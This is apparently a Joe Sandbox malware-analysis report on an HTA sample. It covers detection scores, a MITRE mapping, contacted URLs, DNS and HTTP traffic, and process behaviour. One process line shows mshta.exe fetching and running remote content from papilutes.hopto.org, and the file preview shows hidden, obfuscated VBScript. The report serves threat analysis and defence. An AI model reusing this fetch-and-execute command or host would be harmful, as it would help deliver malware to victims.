Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeWindow / User API: threadDelayed 7467Jump to behavior
Source: mshta.exe, 00000001.00000002.2522777705.00000000031A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWC
Source: mshta.exe, 00000001.00000002.2522777705.000000000312E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.2522777705.00000000031A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\system32\mshta.exe" http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading		11
Process Injection		1
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote Services1
Email Collection		2
Non-Application Layer Protocol		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		11
Process Injection		LSASS Memory1
Application Window Discovery		Remote Desktop ProtocolData from Removable Media12
Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
DLL Side-Loading		Security Account Manager1
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS2
System Information Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1671026 Sample: 2-12749-25_21.04.2025.HTA.hta Startdate: 22/04/2025 Architecture: WINDOWS Score: 2 11 papilutes.hopto.org 2->11 6 mshta.exe 1 2->6         started        process3 process4 8 mshta.exe 15 6->8         started        dnsIp5 13 papilutes.hopto.org 193.124.22.113, 49689, 80 ETOP-ASPL Russian Federation 8->13

Screenshots

Download Video

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
2-12749-25_21.04.2025.HTA.hta3%ReversingLabsWin32.Trojan.Generic
2-12749-25_21.04.2025.HTA.hta5%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxl0%Avira URL Cloudsafe
http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptx0%Avira URL Cloudsafe
http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptx=0%Avira URL Cloudsafe
http://papilutes.hopto.org0%Avira URL Cloudsafe
http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxd0%Avira URL Cloudsafe
http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxm0%Avira URL Cloudsafe
http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxy.IE5R;0%Avira URL Cloudsafe
https://www.crimea.kp.ru/daily/euromaidan/x0%Avira URL Cloudsafe
http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxN0%Avira URL Cloudsafe
https://passport.i.ua/login/?0%Avira URL Cloudsafe
http://papilutes.hopto.org/Gurukr/cableW2l0%Avira URL Cloudsafe
https://www.crimea.kp.ru/daily/euromaidan/0%Avira URL Cloudsafe
http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxC:0%Avira URL Cloudsafe
http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptx?0%Avira URL Cloudsafe

Domains and IPs

Download Network PCAP: filteredfull

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
papilutes.hopto.org
193.124.22.113
truefalse
    		unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxfalse
    • Avira URL Cloud: safe
    		unknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://t.me/mshta.exe, 00000000.00000003.1291320484.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290228062.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290442821.0000000000751000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290442821.000000000076D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1294642550.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290836756.0000000005BC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, 2-12749-25_21.04.2025.HTA.htafalse
      		high
      http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxmmshta.exe, 00000001.00000002.2522777705.000000000312E000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxlmshta.exe, 00000001.00000002.2522777705.000000000312E000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://developer.mozilla.org/en-US/docs/Web/JavaScriptXmshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmpfalse
        		high
        http://papilutes.hopto.orgmshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290836756.0000000005BC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, 2-12749-25_21.04.2025.HTA.htafalse
        • Avira URL Cloud: safe
        		unknown
        https://regnum.ru/foreign/eastern-europe/ukraine.htmlmshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1294642550.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1291320484.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, 2-12749-25_21.04.2025.HTA.htafalse
          		high
          https://www.bbc.com/mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290836756.0000000005BC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292771587.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1291320484.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, 2-12749-25_21.04.2025.HTA.htafalse
            		high
            https://regnum.ru/foreign/eastern-europe/ukraine.htmlHTA.hta#mshta.exe, 00000000.00000003.1288694322.0000000000780000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1291320484.0000000000780000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.0000000000780000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1294642550.0000000000780000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.0000000000780000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              https://developer.mozilla.org/en-US/docs/Web/JavaScriptmshta.exe, 00000000.00000003.1291320484.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290228062.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290442821.000000000076D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1294642550.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290836756.0000000005BC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, 2-12749-25_21.04.2025.HTA.htafalse
                		high
                https://www.ukr.net/mshta.exe, 00000000.00000003.1291320484.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290228062.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290442821.000000000076D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1294642550.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290836756.0000000005BC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, 2-12749-25_21.04.2025.HTA.htafalse
                  		high
                  https://t.me/Gmshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxdmshta.exe, 00000001.00000002.2522588226.0000000000AA9000.00000004.00000010.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxy.IE5R;mshta.exe, 00000001.00000002.2522777705.0000000003170000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.ukr.net/omshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxNmshta.exe, 00000001.00000002.2522777705.000000000312E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://meta.ua/news/all/?gclid=EAIaIQobChMImYXApMKt-QIVsRJ7Ch26PwmoEAAYAiAAEgKMyPD_BwEmshta.exe, 00000000.00000003.1290228062.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290442821.000000000076D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290836756.0000000005BC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, 2-12749-25_21.04.2025.HTA.htafalse
                        		high
                        https://www.crimea.kp.ru/daily/euromaidan/xmshta.exe, 00000000.00000003.1288694322.0000000000780000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1291320484.0000000000780000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.0000000000780000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1294642550.0000000000780000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.0000000000780000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://passport.i.ua/login/?mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292771587.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1291320484.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, 2-12749-25_21.04.2025.HTA.htafalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.unian.net/mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1294722604.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290836756.0000000005BC8000.00000004.00000020.00020000.00000000.sdmp, 2-12749-25_21.04.2025.HTA.htafalse
                          		high
                          http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptx=mshta.exe, 00000001.00000002.2522777705.0000000003170000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.rbc.ru/tags/?tag=mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.0000000000790000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1290836756.0000000005BC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, 2-12749-25_21.04.2025.HTA.htafalse
                            		high
                            http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptx?mshta.exe, 00000001.00000002.2522777705.0000000003170000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxC:mshta.exe, 00000000.00000002.1294457111.0000000000575000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.2522741582.0000000002FF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.2522777705.0000000003110000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://meta.ua/news/all/?gclid=EAIaIQobChMImYXApMKt-QIVsRJ7Ch26PwmoEAAYAiAAEgKMyPD_BwE3PM41zeMBWfPnmshta.exe, 00000000.00000003.1290228062.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://www.crimea.kp.ru/daily/euromaidan/mshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292771587.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1291320484.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, 2-12749-25_21.04.2025.HTA.htafalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://papilutes.hopto.org/Gurukr/cableW2lmshta.exe, 00000000.00000003.1290228062.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1292410893.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294015422.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1294739881.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://meta.ua/news/all/?gclid=EAIaIQobChMImYXApMKt-QIVsRJ7Ch26PwmoEAAYAiAAEgKMyPD_BwEBmshta.exe, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                193.124.22.113
                                		papilutes.hopto.orgRussian Federation
                                		20853ETOP-ASPLfalse

                                General Information

                                Joe Sandbox version:42.0.0 Malachite
                                Analysis ID:1671026
                                Start date and time:2025-04-22 14:27:18 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 4m 10s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:6
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:2-12749-25_21.04.2025.HTA.hta
                                Detection:CLEAN
                                Classification:clean2.winHTA@3/0@1/1
                                EGA Information:Failed
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Found application associated with file extension: .hta
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                • Excluded IPs from analysis (whitelisted): 184.29.183.29, 4.175.87.197
                                • Excluded domains from analysis (whitelisted): c2a9c95e369881c67228a6591cac2686.clo.footprintdns.com, ax-ring.msedge.net, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target mshta.exe, PID 2004 because there are no executed function
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                08:28:08API Interceptor1x Sleep call for process: mshta.exe modified

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                No context

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                ETOP-ASPLhttp://e9ccawf5esyyffhp.premilkyway.comGet hashmaliciousUnknownBrowse
                                • 217.147.172.104
                                511511625.exeGet hashmaliciousXmrigBrowse
                                • 194.58.33.244
                                Update 124.0.6367.158.jsGet hashmaliciousUnknownBrowse
                                • 45.150.65.147
                                https://l24.im/RBD8OoVGet hashmaliciousUnknownBrowse
                                • 185.30.124.158
                                botnet.mips.elfGet hashmaliciousMirai, MoobotBrowse
                                • 31.31.174.7
                                Fantazy.arm7.elfGet hashmaliciousMiraiBrowse
                                • 193.108.114.239
                                RsE1ko6qPW.cmdGet hashmaliciousXmrigBrowse
                                • 194.58.33.244
                                http://t6ceb4773.emailsys2a.net/c/258/8051645/427/0/475433/1/7220/750cd846a5.htmlGet hashmaliciousUnknownBrowse
                                • 185.73.228.142
                                loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                • 79.133.198.95
                                resources.dllGet hashmaliciousDanaBotBrowse
                                • 195.133.88.98

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                No created / dropped files found

                                Static File Info

                                General

                                File type:HTML document, ASCII text, with CRLF line terminators
                                Entropy (8bit):6.034386209596189
                                TrID:
                                • HyperText Markup Language (15015/1) 55.58%
                                • HyperText Markup Language (12001/1) 44.42%
                                File name:2-12749-25_21.04.2025.HTA.hta
                                File size:6'488 bytes
                                MD5:d8eb78d2145229db1a588a24cf632985
                                SHA1:17c5a033e6d0f99218b0d0bb6a18b6aed3e0a9c3
                                SHA256:341435e34c6d146cbb28f4e7de6d2e0e2b7ec2be3625f14a56041124f4af34cd
                                SHA512:6c1914494da3bc453d53e884a58e28d8a9f93405cd6d1e7987c30a8f2b0f585d0af24772a54625ef7b4a1046cf2ec7749e2fd8f644779f23db4893080bd8f8bf
                                SSDEEP:192:2rYfvko4GQ85LC0He/53fOGFPfIbUzJ+U2QDo/:2Gv8GQ8M2e/53HZmUzJPnDo/
                                TLSH:3CD14AEF6C6346AD53256CD9C1121D0BDF1256A5FEA324A7F218BF349221D58318EC3D
                                File Content Preview:<!DOCTYPE html>..<html>..<head>..<HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" />..<script type="text/vbscript">..On Error Resume Next..specialistM95 = "rHKv918Cef852ky5Q846xSwCrDTX"....Set lastlyoNC = Crea

                                Network Behavior

                                Download Network PCAP: filteredfull

                                Network Port Distribution

                                • Total Packets: 11
                                • 80 (HTTP)
                                • 53 (DNS)
                                TimestampSource PortDest PortSource IPDest IP
                                Apr 22, 2025 14:28:10.204953909 CEST4968980192.168.2.5193.124.22.113
                                Apr 22, 2025 14:28:10.510243893 CEST8049689193.124.22.113192.168.2.5
                                Apr 22, 2025 14:28:10.510904074 CEST4968980192.168.2.5193.124.22.113
                                Apr 22, 2025 14:28:10.511223078 CEST4968980192.168.2.5193.124.22.113
                                Apr 22, 2025 14:28:10.816183090 CEST8049689193.124.22.113192.168.2.5
                                Apr 22, 2025 14:28:11.283572912 CEST8049689193.124.22.113192.168.2.5
                                Apr 22, 2025 14:28:11.283900023 CEST4968980192.168.2.5193.124.22.113
                                Apr 22, 2025 14:28:16.285518885 CEST8049689193.124.22.113192.168.2.5
                                Apr 22, 2025 14:28:16.285578012 CEST4968980192.168.2.5193.124.22.113
                                Apr 22, 2025 14:29:59.950443029 CEST4968980192.168.2.5193.124.22.113
                                Apr 22, 2025 14:30:00.699595928 CEST4968980192.168.2.5193.124.22.113
                                Apr 22, 2025 14:30:02.199598074 CEST4968980192.168.2.5193.124.22.113
                                Apr 22, 2025 14:30:05.199594021 CEST4968980192.168.2.5193.124.22.113
                                Apr 22, 2025 14:30:11.184081078 CEST4968980192.168.2.5193.124.22.113
                                TimestampSource PortDest PortSource IPDest IP
                                Apr 22, 2025 14:28:09.982322931 CEST5146153192.168.2.51.1.1.1
                                Apr 22, 2025 14:28:10.172990084 CEST53514611.1.1.1192.168.2.5

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Apr 22, 2025 14:28:09.982322931 CEST192.168.2.51.1.1.10x8975Standard query (0)papilutes.hopto.orgA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Apr 22, 2025 14:28:10.172990084 CEST1.1.1.1192.168.2.50x8975No error (0)papilutes.hopto.org193.124.22.113A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • papilutes.hopto.org

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.549689193.124.22.113802004C:\Windows\SysWOW64\mshta.exe
                                TimestampBytes transferredDirectionData
                                Apr 22, 2025 14:28:10.511223078 CEST337OUTGET /Gurukr/cableW2l/comparableKrE.pptx HTTP/1.1
                                Accept: */*
                                Accept-Language: en-CH
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                Host: papilutes.hopto.org
                                Connection: Keep-Alive
                                Apr 22, 2025 14:28:11.283572912 CEST201INHTTP/1.1 200 OK
                                Date: Tue, 22 Apr 2025 12:28:10 GMT
                                Server: Apache/2.4.62 (Debian)
                                Content-Length: 0
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: application/postscript


                                Statistics

                                CPU Usage

                                050100s020406080100

                                Click to jump to process

                                Memory Usage

                                050100s0.00510152025MB

                                Click to jump to process

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:08:28:07
                                Start date:22/04/2025
                                Path:C:\Windows\SysWOW64\mshta.exe
                                Wow64 process (32bit):true
                                Commandline:mshta.exe "C:\Users\user\Desktop\2-12749-25_21.04.2025.HTA.hta"
                                Imagebase:0xaf0000
                                File size:13'312 bytes
                                MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                Show Windows behavior

                                Section Activities

